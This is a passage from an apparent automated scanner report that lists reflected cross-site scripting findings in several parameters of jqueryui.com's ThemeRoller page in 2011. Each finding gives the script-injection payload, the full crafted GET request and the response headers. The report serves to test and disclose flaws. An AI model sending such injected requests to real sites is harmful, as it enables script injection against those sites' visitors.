yHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120110
The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9556f"><script>alert(1)</script>e4c26e517e3 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png9556f"><script>alert(1)</script>e4c26e517e3&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120110
The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ba1"><script>alert(1)</script>72d1a61f66b was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png86ba1"><script>alert(1)</script>72d1a61f66b&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120110
The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ad96"><script>alert(1)</script>adb4bcaf6ab was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png6ad96"><script>alert(1)</script>adb4bcaf6ab&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120110
The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd60"><script>alert(1)</script>1fc4e4ea6f4 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.pngbdd60"><script>alert(1)</script>1fc4e4ea6f4&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120110
The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 119b8"><script>alert(1)</script>1d4c850f75b was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png119b8"><script>alert(1)</script>1d4c850f75b&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120110
The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3967f"><script>alert(1)</script>06e01fad325 was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png3967f"><script>alert(1)</script>06e01fad325&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120110
The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b598f"><script>alert(1)</script>9b666fce69d was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngb598f"><script>alert(1)</script>9b666fce69d&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120110
The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68d6e"><script>alert(1)</script>f49d4a88311 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e768d6e"><script>alert(1)</script>f49d4a88311&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 425e2"><script>alert(1)</script>1e60faee7e4 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2425e2"><script>alert(1)</script>1e60faee7e4&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9910"><script>alert(1)</script>45b756f1365 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbecd9910"><script>alert(1)</script>45b756f1365&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9875"><script>alert(1)</script>ed090a1eadc was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0aa9875"><script>alert(1)</script>ed090a1eadc&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0fc0"><script>alert(1)</script>1c9dbf1a53a was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7c0fc0"><script>alert(1)</script>1c9dbf1a53a&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
